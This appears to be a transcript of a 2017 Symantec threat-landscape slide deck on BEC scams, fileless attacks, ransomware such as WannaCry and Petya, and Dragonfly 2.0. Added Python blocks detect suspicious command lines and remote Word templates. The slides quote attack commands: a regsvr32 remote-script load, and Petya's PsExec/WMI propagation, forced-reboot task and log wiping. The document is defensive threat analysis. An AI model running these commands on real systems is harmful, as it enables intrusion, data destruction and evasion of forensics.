Threat landscape update: June to September 2017


Transcript of Threat landscape update: June to September 2017

Page 1: Threat landscape update: June to September 2017

Threat Landscape Q2 / 2017 Update

Presenters: Asim Rab, Candid Wueest

Date: Sept 2017

Page 2

Copyright © 2017 Symantec Corporation

General trends

Simple, but successful

o Low-tech attacks (BEC)

o Living off the land and fileless

o Emails with social engineering

Focused and selective

o More ransomware in corporations

o Selective spreading of malware

o Attacking supply chain companies

Page 3

Malware statistics

o More than 2 Million new malware variants per day

o Script malware leads to many variants

Region          % of global
USA             27.26%
Japan            6.49%
China            6.04%
India            5.82%
Brazil           4.12%
Germany          3.97%
Great Britain    3.59%
Canada           2.65%
France           2.55%
Russia           2.32%
Australia        2.17%
Italy            2.03%
Mexico           1.67%
South Korea      1.34%
Turkey           1.28%
Netherlands      1.27%
Spain            1.26%
Indonesia        1.11%
Poland           1.08%
Taiwan           0.90%

[Chart: New malware variants per month in millions, January to August 2017 (axis 0 to 100)]

Page 4

Web attacks still elevated

[Chart: Web attacks blocked per day, January to August 2017 (axis 0 to 1,400,000)]

o Normally no zero-day exploits are used

o RIG toolkit is most active

o Links are spread by email or advertisement

o Sometimes infections are restricted to specific IP addresses

o Supply chain attacks increased

Page 5

Malicious documents still common

Malicious doc containing macro with social engineering

Embedded binary can be double-clicked

Page 6

o More than half of the malicious attachments are script files

o Macros or JavaScript usually download the final payload

o Most common payloads are ransomware and financial Trojans

Infection chain: Email (e.g. invoice or receipt) -> Attachment (e.g. JavaScript) -> Downloader (e.g. PowerShell) -> Payload (e.g. Ransomware)

Whitepaper available

Page 7

Section 2: Business Email Compromise (BEC)

Page 8

Low-tech attacks: Business email compromise

[Chart: BEC emails received per targeted organization, Jan to Jun 2017; monthly values range from 4.3 to 6.8]

o Spear-phishing taken to the next level

o Convince the company to perform a payment transaction

o Scams often use typo-squatted domains

o Some attacks change the IBAN in invoices

o Exposed losses from Oct 2013 to Dec 2016 were over $5bn

o 8,000 businesses targeted monthly

Page 9

BEC subject lines

The top three subjects feature in 2/3 of all emails: PAYMENT, URGENT, REQUEST

They create a sense of urgency, requiring immediate action, to pressure the recipient into acting

Page 10

Section 3: Living off the land

Whitepaper available

Page 11

Living off the land

When attackers turn what you have against you

o Fewer new files on disk

  o More difficult to detect the attack, no IoCs to share

o Use off-the-shelf tools & cloud services

  o Difficult to determine intent & source

o These tools are ubiquitous

  o Hiding in plain sight

o Finding exploitable zero-day vulnerabilities is getting more difficult

  o Use simple and proven methods such as email & social engineering

Page 12

Fileless attacks

Multiple fileless options exist, but not all are truly fileless:

o Memory-only attacks: e.g. remote code exploits such as EternalBlue and CodeRed

o Non-PE files: documents containing macros, PDFs with JavaScript, and scripts (VBS, JavaScript, PowerShell, ...)

o Fileless loadpoint: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver

o Dual-use tools: using benign tools, such as PsExec, to do malicious things

Page 13

Living off the land attack chain

Incursion

o Exploit in memory, e.g. SMB EternalBlue

o Email with Non-PE file, e.g. document macro

o Weak or stolen credentials, e.g. RDP password guess

Persistence

o Non-persistent: remote script dropper, e.g. LNK with PowerShell from cloud; memory-only malware, e.g. SQL Slammer

o Persistent: fileless persistence loadpoint, e.g. JScript in registry; traditional methods

Payload

o Regular non-fileless payload

o Non-PE file payload, e.g. PowerShell script

o Memory-only payload, e.g. Mirai DDoS

o Dual-use tools, e.g. netsh or PsExec.exe

Page 14

Non-PE files

o Scripts are very common, especially PowerShell

o Many script toolkits available, e.g. PS Empire

o Scripts are easy to obfuscate and difficult to detect with signatures

o Scripts are flexible and can be adapted quickly

Whitepaper available

Page 15

Fileless loadpoints

Example: Remote SCT load

o Registry run key can point to a remote SCT file

o Regsvr32 will download and execute the embedded JScript

Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll

Downloader.Dromedan (40,000 detections per day)

o The JScript embedded in the malicious .sct file uses WMI to execute a PowerShell payload

o The script stores an encoded DLL in the registry for later use

Page 16

Section 4: Ransomware

Whitepaper available

Page 17

Ransomware stats

o Ransomware is still profitable and common

o Multiple self-propagating variants appeared

[Chart: ransomware per month, Jan-16 to Jun-17 (axis 0 to 90,000), with trend line]

Ransomware by country:

United States    29%
Japan             9%
Italy             8%
India             4%
Germany           4%
Netherlands       3%
UK                3%
Australia         3%
Russia            3%
Canada            3%
Other Countries  31%

Page 18

Ransomware in enterprises

o 42% of ransomware infections in 2017 were in enterprises

  o Due to WannaCry and Petya

o Attacks against cloud storage increased

[Chart: Consumer vs. Enterprise ransomware per month, Jan-16 to Jun-17 (axis 0 to 60,000)]

Page 19

WannaCry

o 1 Billion EternalBlue infection attempts blocked

o Profit $140K, Bitcoin accounts emptied August 3rd

o Linked to Lazarus group

[Chart: WannaCry, unlabelled series (axis 0 to 120,000)]

Page 20

Petya

o Petya (June variant) classified as a wiper

o Semi-targeted infections through supply chain hack (MEDoc)

o Profit $10K, Bitcoin account emptied July 4th

[Chart: Petya, unlabelled series (axis 0 to 160)]

Page 21

Petya uses dual-use tools

o Threat is a DLL executed by rundll32.exe

o Uses recompiled version of LSADump Mimikatz to get passwords

o Uses PsExec to propagate

  o \\[server_name]\admin$\perfc.dat

  o psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]

o Uses WMI to propagate if PsExec fails

  o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"

o Scheduled task to restart into the malicious MBR payload

  o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42

o Deletes log files to hide traces

  o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
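The command lines on slides 15 and 21 are what a defender can hunt for in process-creation telemetry. The following added example (not from the Symantec deck) runs a small set of detection rules over constructed events; the rule names, regexes, host names, node address and SCT URL are this example's own assumptions, not Symantec signatures.

```python
import re

# Detection rules for the living-off-the-land command lines shown on slides 15
# (regsvr32 loading a remote SCT) and 21 (Petya's WMI, rundll32, schtasks and
# wevtutil usage). Patterns and names are this example's own.
RULES = {
    # slide 15: Run key -> regsvr32 /i:<remote .sct> scrobj.dll (Downloader.Dromedan)
    "regsvr32_remote_sct": re.compile(
        r"regsvr32(\.exe)?\b.*?/i:\s*\"?https?://.*scrobj\.dll", re.I),
    # slide 21: remote process creation over WMI when PsExec fails
    "wmic_remote_process_create": re.compile(
        r"wmic(\.exe)?\b.*?/node:.*\bprocess\s+call\s+create\b", re.I),
    # slide 21: rundll32 given a module whose extension is not .dll (perfc.dat)
    "rundll32_non_dll_module": re.compile(
        r"rundll32(\.exe)?\s+\S*\.(?!dll\b)\w+\b", re.I),
    # slide 21: scheduled task forcing a reboot into the modified MBR
    "schtasks_forced_reboot": re.compile(
        r"schtasks\b.*?/create\b.*?shutdown(\.exe)?\s+(/r|/s)\b", re.I),
    # slide 21: event log clearing and USN journal deletion
    "log_clearing": re.compile(
        r"\bwevtutil(\.exe)?\s+cl\b|\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I),
}

def analyze(cmdline):
    """Return the sorted names of all rules matching one process command line."""
    text = " ".join(cmdline.split())  # collapse whitespace padding
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(events):
    """events: iterable of (host, command_line). Returns [(host, rule), ...]."""
    hits = []
    for host, cmdline in events:
        hits.extend((host, rule) for rule in analyze(cmdline))
    return hits

# Constructed sample events mirroring the slides' command lines; hosts, the
# /node address, the URL and the bracketed values are placeholders.
SAMPLE_EVENTS = [
    ("ws01", r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"),
    ("ws02", r'wmic.exe /node:10.0.0.5 /user:[USERNAME] /password:[PASSWORD] '
             r'process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'),
    ("ws02", r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:42'),
    ("ws02", r"wevtutil cl Setup & wevtutil cl System & fsutil usn deletejournal /D C:"),
    ("ws03", r'regsvr32 /s "C:\Program Files\App\component.dll"'),  # benign
    ("ws03", r"rundll32.exe shell32.dll,Control_RunDLL"),           # benign
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Several hits from one host within a short window (WMI launch, forced reboot task, log clearing) is the pattern that distinguishes the Petya chain from an administrator using any one of these tools legitimately.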

Page 22

Section 5: Targeted attack groups

Page 23

Dragonfly 2.0

o Active since December 2015 in Europe and North America

o Ongoing attacks against energy sector, mainly in Turkey and U.S.

Infiltration

o Compromised websites and spear phishing (Phishery toolkit)

o Trojanized software, using Shellter evasion framework

o Various backdoors:

• Trojan.Listrix

• Trojan.Credrix

• Backdoor.Goodor

• Backdoor.Dorshell

• Trojan.Karagany.B

• Trojan.Heriplor

Slide deck available

Page 24

Dragonfly 2.0

o Uses living off the land tactics

  o PowerShell, PsExec, and BITSAdmin

o Phishery toolkit became available on GitHub in 2016

  o Document used an SMB template link to leak credentials

o Screenutil and Shellter are available online

Goal

o Information stealing: passwords, documents and screenshots

o Potential for sabotage attacks
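The template link described above lives in the document's settings relationships, so it can be checked before the file is ever opened. The following added example (not from the deck or from the Phishery project) inspects a .docx for an external attached template and classifies the target; the .docx it builds is a constructed stand-in and the hosts in it are placeholders.

```python
import io
import re
import zipfile

# Word resolves an external attachedTemplate when the document opens. A UNC
# target makes Word authenticate over SMB (NTLM leak); an HTTP target lets the
# server demand credentials, which is the Phishery approach on slide 24.
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")
REL_RE = re.compile(r"<Relationship\b[^>]*>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')

def classify_target(target):
    """Map a relationship Target to 'smb', 'http' or 'local'."""
    t = target.strip().lower()
    if t.startswith("\\\\") or t.startswith("file://") or t.startswith("smb://"):
        return "smb"
    if t.startswith("http://") or t.startswith("https://"):
        return "http"
    return "local"

def remote_template_targets(docx_bytes):
    """Return [(target, kind)] for every external attachedTemplate in the .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return hits  # no settings relationships, so no template link
        rels = z.read("word/_rels/settings.xml.rels").decode("utf-8", "replace")
    for rel in REL_RE.findall(rels):
        attrs = dict(ATTR_RE.findall(rel))
        if attrs.get("Type") == TEMPLATE_REL and attrs.get("TargetMode") == "External":
            kind = classify_target(attrs.get("Target", ""))
            if kind != "local":
                hits.append((attrs["Target"], kind))
    return hits

def build_docx(template_target=None):
    """Build a minimal constructed .docx, optionally with an attached template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if template_target is not None:
            z.writestr("word/settings.xml",
                       '<w:settings><w:attachedTemplate r:id="rId1"/></w:settings>')
            z.writestr("word/_rels/settings.xml.rels",
                       '<Relationships><Relationship Id="rId1" Type="%s" '
                       'Target="%s" TargetMode="External"/></Relationships>'
                       % (TEMPLATE_REL, template_target))
    return buf.getvalue()
```

A mail gateway or sandbox can run `remote_template_targets` on every inbound Office attachment and quarantine any document whose template points off the local machine.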

Page 25

Supply chain attacks increasing

o Many cases where legitimate software was compromised

o Fast and semi-targeted distribution through the update process

o Trojanized updates are difficult to discover

  o Trusted domain, digitally signed, trusted update process, ...

Examples:

o MEDoc (Petya, June 2017)

o CCleaner (Aug 2017)

o Python modules (Sept 2017)

o ICS supplier (Dragonfly 2014)

Page 26

Summary

o Cybercriminals are focusing on simple but effective methods

o Ransomware is still very prevalent

o Living off the land tactics are increasingly used

o Often targeted infections with limited distribution